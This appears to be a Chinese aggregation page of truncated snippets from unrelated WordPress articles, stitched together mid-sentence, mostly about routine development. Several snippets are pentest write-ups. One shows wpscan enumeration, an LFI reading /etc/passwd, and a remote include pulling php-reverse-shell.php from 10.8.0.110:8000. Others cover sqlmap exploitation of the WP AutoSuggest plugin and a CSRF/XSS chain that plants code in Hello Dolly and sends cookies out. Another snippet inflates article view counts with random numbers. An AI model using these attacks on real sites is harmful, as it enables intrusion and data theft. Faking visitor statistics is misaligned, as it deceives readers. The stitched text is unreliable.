WordPress 默认的分类目录 URL 中是带 category 的,比如我爱水煮鱼的 WordPress 的分类目录的 URL https://blog.wpjam.com/category/wordpress...有些用户博客的分类就是二级目录,希望去掉分类目录 URL 中的 category,如何操作呢?...方式一:使用插件 网上有很多这方面功能的 WordPress 插件,都可以去掉分类目录 URL 中的 category,这些插件的实现方式是把所有的分类都写入 WordPress 的 rewrite 规则...方式二:设置分类目录前缀 另外 WordPress 还有一个非常方便的方法,可以说是最简化去掉分类目录 URL 中的 category。...就可以: 方式三:最佳方法 如果仔细观察一下去掉 category 的分类目录 WordPress 的页面的 URL: 去掉 category 的分类目录页面:https://blog.wpjam.com
我之前的「WordPress 文章查询教程6:如何使用排序相关的参数」中详细介绍了文章查询的排序参数,其中介绍可以通过评论数进行排序: $query = new WP_Query( array(...'orderby' => 'comment_count' ) ); 但是需求总是不停的变化,现在又有了新需求,获取最新被评论的文章列表,意思就是某篇文章刚被评论,它就排到最前面,在某些社交需求的网站可能需要用到...$order}"; } return $clauses; }, 10, 2); 上面的代码简单解释一下,就是通过 posts_clauses 接口实现文章表和评论表连表,然后通过评论时间进行排序获取最新被评论的文章列表...当然你也可以不需要了解和使用上面的代码,因为 WPJAM Basic 已经整合,你只需要知道最后可以通过下面简单的方式就能够获取最新被评论的文章列表: $query = new WP_Query( array
如何在WordPress网站中添加Cookie弹出窗口 如果你是使用WordPress建站的用户,那么有可能你的网站已经在使用Cookie来收集访问者的数据,如果您没有在网站上显示任何同意Cookie...在这篇文章中,晓得博客为你详细介绍不适用插件如何在 WordPress 网站中添加Cookie弹出窗口。...不适用插件向WordPress网站添加Cookie通知 向WordPress网站添加插件可能会减慢速度。因此,如果可能,最好限制插件安装并手动调整所有内容。...总结 以上为不使用插件在WordPress网站中添加Cookie弹出窗口,现在,你已经学会了如何通过粘贴生成的代码来显示WordPress Cookie通知。...推荐:如何在WordPress网站中添加免费在线聊天功能-Chaty插件教程 晓得博客,版权所有丨如未注明,均为原创 晓得博客 » 如何在WordPress网站中添加Cookie弹出窗口(不使用插件)
下面是关于如何在 WordPress 源码中开发主题和插件的基本指南: 开发 WordPress 主题: 创建主题目录: 在 WordPress 的wp-content/themes/目录下创建一个新的文件夹...基本结构: 在index.php文件中,使用 WordPress 提供的函数来获取头部、尾部等页面结构。 可以创建其他模板文件,如header.php、footer.php等,以更好地组织代码。...开发 WordPress 插件: 创建插件目录: 在 WordPress 的wp-content/plugins/目录下创建一个新的文件夹,该文件夹即为你的插件名称。...添加后台页面: 使用add_menu_page等函数来添加插件在 WordPress 后台的菜单页面。 在页面中添加表单和处理逻辑,如保存设置。...使用 Ajax: 使用 WordPress 提供的 Ajax API 来处理异步请求,提升用户体验。 安全性和错误处理: 对插件进行安全性审查,确保用户输入的数据经过验证和过滤。
下面开始教程: 如何获取 Hook 优先级 我们在 WordPress 进行开发的时候,肯定会使用到 WordPress 的 Hook,通过 add_filter 或者 add_action 把某个回调函数传递给某个...在回调函数中,我们可以通过 current_filter 函数可以获取当前回调函数是在执行那个 Hook 中,但是如果要获取当前回调函数优先级,WordPress 就没有相关的函数了,所以我自己写了一个...$hook->current_priority() : null; } 获取 Hook 优先级有什么用 我们可能要移除接口的某个回调函数,然后最后又要加回来,怎么处理呢?...如果和我一样为了偷懒,这前后的移除和添加的回调函数是同一个,那就要在回调函数中判断当前的优先级了: function wpjam_filter_content_save_pre($content){...该功能已经整合到 WPJAM Basic 插件中,并已免费提供下载,简单勾选或者设置下即可开启!
攻击最好的方法,WordPress Nonce 通过提供一个随机数,来实现在数据请求(比如,在后台保存插件选项,AJAX 请求,执行其他操作等等)的时候防止未授权的请求。...wp_create_nonce() 函数创建 nonce: $nonce= wp_create_nonce('wpjam'); 然后将生成 $nonce 的值作为参数传递给请求中,如: "> 如果在 WordPress 后台页面,可以使用 check_admin_referer() 函数验证 nonce,它会自动从链接的查询参数中获取 nonce 并验证它: check_admin_referer...> jQuery.ajax({ type: "post", url: ajax_url, data: { action: 'weixin_share', share_type: share_type...); } }); 服务器处理代码: check_ajax_referer( "weixin_robot" ); WPJAM Basic 严格遵守 Nonce WPJAM Basic 插件以及 WordPress
使用命令wpscan --url http://172.16.33.108/wordpress/ --enumerate u扫描 WordPress 用户,发现admin和aarti用户。...使用命令wpscan --url http://172.16.33.108/wordpress/扫描 WordPress 插件,发现 7 个插件。...使用命令searchsploit -m 44340将 EXP 拷贝到当前目录后使用命令cat 44340.txt获得漏洞 URL,最终构造 URLhttp://172.16.33.108/wordpress...ajax_path=/etc/passwd在浏览器中访问,成功拿到/etc/passwd 文件,确认存在 LFI 本地文件包含漏洞。...ajax_path=http://10.8.0.110:8000/php-reverse-shell.php在浏览器中访问,结果报错{"success":false,"message":"Error:
最近就看到了一个WordPress插件问题导致的SQL注入漏洞,抱着好奇的心,我就开始这个漏洞的复现与分析。...WP AutoSuggest简介 WP AutoSuggest 这款插件在访问者输入关键字时,插件会在提交搜索查询之前通过AJAX请求在网页中显示一些建议。...下载完成之后,把wp-autosuggest目录直接拖到Wordpress目录的\wp-content\plugins\下。 ? 接着,登录后台,启用这款插件,如下图所示: ?...通过SQLMAP,成功获取到服务器的一些信息,如下图所示: ? 下图也成功跑出了当前数据库的名称。 ? 漏洞分析 分析WordPress插件的话还是挺容易的。...一点都没过滤,并且在之后的代码中(由于篇幅所限,后面的代码未全部贴出),变量wpas_keys也带入数据库中查询了(wpdb是wordpress操作数据库方法),于是SQL注入就产生了。 ?
它是 WordPress 设置中理想的隐私探查工具。...Category Excluder – 建立一些浏览者没有权限浏览的分类目录。...AWSOM – 这个插件能让制作一篇“置顶”文章或留言。 asTunes – 获取Audioscrobbler或last.fm中的数据并以列表的形式发表到博客上。...这个插件可以友好地提供你站点上访问者需要的相关内容。 No WWW – 将所有含有www的URL都转向到无www的URL。 Optimal title – title优化插件。...Inline Ajax Comments – 在访问者点击前隐藏评论。 Inline Ajax Page – 允许用户在查看某篇日志前获取其摘要。
而在默认下载的Wordpress中,都会包含Hello Dolly插件,通过修改这个插件内容并启动插件,我们可以执行想要的任何代码。...但在这之前,我们首先要了解一下,wordpress关于csrf的防御机制,在wordpress中引入了_wpnonce作为判断请求来源的参数。...php /* Plugin Name: Hello Dolly Version: 1.6 */ 那么我们来构造完整的攻击请求 1、构造xss攻击链接->管理员点击->修改插件目录的hello.php->...启动hello, holly插件->访问首页->触发攻击 2、hello.php页面直接获取cookie发出。...在wordpress的插件yoast seo中,包含一个自带的功能可以修改整战根目录的.htaccess文件。
Sticky Posts Switch插件教程WordPress中为分类添加置顶文章Sticky Posts Switch插件教程WordPress中为分类添加置顶文章 默认情况下,WordPress...在本文中,我们晓得博客将向您展示如何在WordPress中为类别添加置顶文章。 注意:Sticky Post仅适用于内置帖子类型帖子,不适用于自定义帖子类型。 ...和 MultilingualPress如何在WordPress中为类别添加置顶文章? ...Sticky Posts Switch插件教程WordPress中为分类添加置顶文章 此外还可以选择在主页、帖子存档页面或分类页面(如类别和标签)上显示粘性帖子的位置。...推荐:SearchWP Live Ajax Search插件教程WordPress添加Ajax搜索晓得博客,版权所有丨如未注明,均为原创晓得博客 » Sticky Posts Switch插件教程WordPress
值:true DOING_AJAX 如果是来自 AJAX 的请求,将被定义。 值:true DOING_AUTOSAVE 当 WordPress 正在自动保存日志的时候,将被定义。...'/languages' WP_PLUGIN_DIR 插件目录的绝对路径。 默认:WP_CONTENT_DIR.'/plugins' WP_PLUGIN_URL 插件目录的 url。...wp-content' WP_CONTENT_URL wp-content 目录的URL 默认:get_option('siteurl') ....'/wp-content' WP_HOME WordPress 的主页。 WP_SITEURL WordPress 根目录的 URL WP_TEMP_DIR 临时目录的绝对路劲。.../mu-plugins' WPMU_PLUGIN_URL 必须使用的插件目录的 URL 默认:WP_CONTENT_URL.'
看见有Robots.txt文件,相信很多在做渗透测试的时候都是基于该文件寻找敏感目录或者敏感文件的,可是本次测试中,该文件并没有提供到有效的目录或者文件信息,但是却给予了管理员信息,导致尝试登陆后台的过程中进入后台...该插件目前已经活跃安装30万+。 ? 注意该插件版本最新版本是1.5.56,使用自定义版本插件下载的方法下载1.5.34版本。 ? 下载下来后先查看一下目录结构。 ?...先在互联网上检索一下,该插件是否存在漏洞,检索出来的信息都比较久远,或者就是低于当前版本,在CVE库中检索该插件信息。 ?...WordPress中的add_action是添加动作的,也就是添加到admin_ajax文件的,后面还拼装了一个$this->prefix参数,查看该参数的值。 ?...默认值为bwg,所以根据WordPress的规则这里拼出的URL应该就是: http://localhost/wordpress-5.2.3/wp-admin/admin-ajax.php?
Weblog Tools Collection 的 APAD: Sphere It Plugin 名称: Sphere It Plugin 插件页面: http://sphere.wordpress.com.../2007/03/31/sphere-it-plug-in-for-wordpressorg-bloggers/ 描述: 在你的 WordPress blog 中增加一个 AJAX 特性的链接,并能从...评论: Sphere It 是一个易于使用和安装的插件。只用拉到你的插件目录,然后在控制的界面激活它。...这个插件可能会让你回想起社区网络化插件,如 Alex’s Share This,或者动态相关的条目插件,如 Waypath。 我非常喜欢这个插件,很多大人物都 在使用它哦。...单击 Sphere 图标,就会打开一个新的 AJAX 窗口,这个窗口中包含一些从讨论相同主题的其他 bloggers 和从博客世界和新的站点相似文章获取的文章列表。
本教程是为了解决那些刚刚创建的网站,被访客浏览时,网站文章阅读量数字显示个位或是十位数的尴尬,以下内容只针对于主题安装或是集成了wp-postviews插件的wordpress主题,通过以下wordpress...插件的修改方法与wordpress主题的修改方法实现流量爆棚的效果。...*/ function cx_statistics_visitors( $cache = false ){ global $post; //页面判断 if(is_single()): //非缓存模式获取...> $(function(){ $.ajax({ type: 'GET', dataType: 'html', url: chenxing.ajax_url...update_post_meta($id,'views',($post_views +mt_rand(61, 367))); } endif; } function Bing_statistics_cache(){ //缓存模式获取文章
默认值:None $src:(可选)WordPress网站根目录下的JS路径。如:”/wp-includes/js/xxx.js”。...('my_test','ajax_object',array('ajax_url'=>admin_url('admin-ajax.php'))); } ......请求 这里我们不能之间在admin-ajax.php中对ajax进行处理,这样做就是修改了核心文件 观察 admin-ajax.php 发现其挂载了两个钩子wp_ajax_...和wp_ajax_nopriv...我们在初始化的时候将函数添加到这两个钩子上即可在插件中对ajax请求进行处理 在构造函数中 public function __construct() { add_action(...('my_test','ajax_object',array('ajax_url'=>admin_url('admin-ajax.php'))); //处理ajax 钩子
通过遵循如何在CentOS 7上安装MySQL来安装MySQL 。 Caddy通过遵循如何在CentOS 7教程中托管与Caddy的网站来安装,包括配置为指向您的Droplet的域名 。...sudo yum update 安装PHP和PHP扩展 WordPress取决于,如支持MySQL, curl ,XML和多字节字符串。...在此步骤中,我们将下载该版本,因为在访问GUI之前,需要配置Web服务器。 首先,将当前目录更改为存储您的网站文件的Web根目录/var/www 。...fastcgi指令配置PHP处理程序来支持具有php扩展名的文件 使用rewrite指令启用漂亮的URL(在WordPress中称为漂亮的永久链接)。...除Apache之外的Web服务器已经成为WordPress的常见问题,所以这些.htaccess依赖的插件中并不存在很多。
一、下载代码 为了省去如何修改代码洋洋洒洒的几百字,张戈决定直接将修改好的代码打包分享出来: 下载地址 下载解压后,将得到的 myqaptcha 文件夹整体上传到 WordPress 主题目录下备用。...二、部署代码 部署很简单,编辑 WordPress 主题目录下的 functions.php,在<?...修改很简单: 编辑 comments-ajax.js 找到如下代码: /** Ajax */ $.ajax( { url: ajax_php_url, data: $(this).serialize...*/ $.ajax( { url: ajax_php_url, data: $(this).serialize(), type: $(this).attr('method'), error...Ps:如果博客用了 CDN,请编辑 comments-ajax.js ,找到 如下代码,自行修改下: //js_url = js_url.replace('res.zhangge.net','zhangge.net
(WordPress 5.1-alpha-44280) 2、通过图片的裁剪功能,将裁剪后的图片写到任意目录下(目录穿越漏洞) 在WordPress的设定中,图片路径可能会收到某个插件的影响而不存在,如果目标图片不在想要的路径下时...,WordPress就会把文件路径拼接为形似http://127.0.0.1/wp-content/uploads/2019/02/2.jpg 的url链接,然后从url访问下载原图 如果我们构造?...在WordPress的设定中,图片路径可能会受到某个插件的影响而不存在,如果目标图片不在想要的路径下时,WordPress就会把文件路径拼接为形似 http://127.0.0.1/wp-content...在写入的目标目录下,存在一个假目录,为1.jpg? 而linux、mac支持这种假目录,可以使用?号 但windows在路径中不能有?...2、 通用防御方案 使用第三方防火墙进行防护(如创宇盾)。
wordpress插件数量巨大,有改善用户体验的,有辅助SEO的,有增加功能的。要从这茫茫中的插件找出所需已属不易,外加无数英语系插件更让不熟悉英语中国用户难上加难。...8、Ajax Comments-Reply:将留言系统设置成Ajax形式,不用刷新即可添加评论。 9、DMS Guestbook:为你的博客制作一个留言本。...20、No WWW:将所有含有www的URL都转向到无www的URL。 21、Simple Tagging:给文章添加标签。...133、TDO Mini Forms:联系插件 134、支付宝捐赠插件:添加支付宝捐赠图像 135、Wordpress Comment Url Validation:自动更正留言者的网址 136、WP-Cats...193、TDO Mini Forms:联系插件 194、支付宝捐赠插件:添加支付宝捐赠图像 195、Wordpress Comment Url Validation:自动更正留言者的网址 196、WP-Cats
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
腾讯会议
云直播
对象存储
